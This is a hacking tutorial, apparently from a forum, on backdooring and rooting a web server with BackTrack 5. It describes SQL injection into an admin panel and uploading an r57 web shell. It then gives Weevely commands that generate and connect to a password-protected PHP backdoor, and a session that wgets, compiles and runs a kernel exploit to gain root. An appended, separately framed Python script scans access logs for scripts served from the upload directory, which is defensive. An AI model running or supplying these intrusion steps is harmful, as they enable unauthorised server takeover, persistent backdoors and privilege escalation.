BackDoor & Rooting With Backtrack 5
Today I'm going to post a tutorial on backdooring a server with BackTrack 5.
For this you need a virtual machine with BackTrack 5 (BT5) installed.
OK, now let's start.
Assume our target site: http://target.com/
We have already compromised the site's admin panel via SQL injection (assumption: the site was vulnerable to SQL injection).
Admin panel: http://target.com/admin/index.php
After logging into the admin panel we uploaded our shell (r57.php).
Shell location on the server: http://target.com/uploads/r57.php
Now run your VMware >> BackTrack 5...
The game starts now.
Backdooring a server with an encrypted PHP backdoor.. amazing!!
Now go and check your desktop. There will be an encrypted PHP file, bdoor.php.
=>Firefox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>Firefox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location
Now we have to connect to our encrypted bdoor.php.
Which exploit to use depends on the kernel you have: different versions have different exploits. You need to get the exploit, compile it, and execute it.
root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Where:
-p = your password to access the backdoor
-g = generate a new encrypted PHP file (it doesn't actually encrypt the file; it encodes it)
-o = specify your output file
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p shadow008
+ Backdoor file ‘bdoor.php ’ created with password ‘shadow008".
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://target.com/uploads/bdoor.php -p shadow008
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.
[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!
[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp
Directory pcp Successfully Created.
[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a
Linux 2.6.32 kernel (Assume)
[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-
[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp] Rooted ... Enjoy!!
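Added example, not part of the original tutorial: a defender-side check that scans web access logs for the pattern the walkthrough depends on, namely server-side scripts (r57.php, bdoor.php) being served from the upload directory. It assumes Apache/Nginx "combined" log format and that uploads live under /uploads/ as on the page; the function name and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Constructed sample lines in "combined" log format (not from a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2012:10:01:02 +0000] "POST /admin/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2012:10:03:40 +0000] "GET /uploads/r57.php HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2012:10:05:11 +0000] "POST /uploads/r57.php HTTP/1.1" 200 20990 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2012:10:06:30 +0000] "GET /uploads/bdoor.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2012:10:07:00 +0000] "GET /uploads/logo.png HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2012:10:07:05 +0000] "GET /uploads/Old.PHP?x=1 HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: user uploads are stored under /uploads/, as on the page.
UPLOAD_PREFIX = "/uploads/"
SCRIPT_RE = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)

def find_upload_scripts(log_text):
    """Return {path: {"ips": set, "hits": int, "first_seen": str}} for
    server-side scripts that were actually served from the upload directory."""
    findings = defaultdict(lambda: {"ips": set(), "hits": 0, "first_seen": None})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, when, _method, target, status = m.groups()
        path = unquote(urlsplit(target).path)   # drop query string, decode %xx
        name = path.rsplit("/", 1)[-1]
        if not path.lower().startswith(UPLOAD_PREFIX) or not SCRIPT_RE.search(name):
            continue
        if not status.startswith("2"):          # 404/403: file absent or blocked
            continue
        entry = findings[path]
        entry["ips"].add(ip)
        entry["hits"] += 1
        entry["first_seen"] = entry["first_seen"] or when
    return dict(findings)

if __name__ == "__main__":
    for path, info in sorted(find_upload_scripts(SAMPLE_LOG).items()):
        print(path, info["hits"], sorted(info["ips"]), info["first_seen"])
```

Any hit means the web server handled a script from a user-writable directory; the durable fix is to stop the server from executing scripts in the upload directory at all, so an uploaded file can never run.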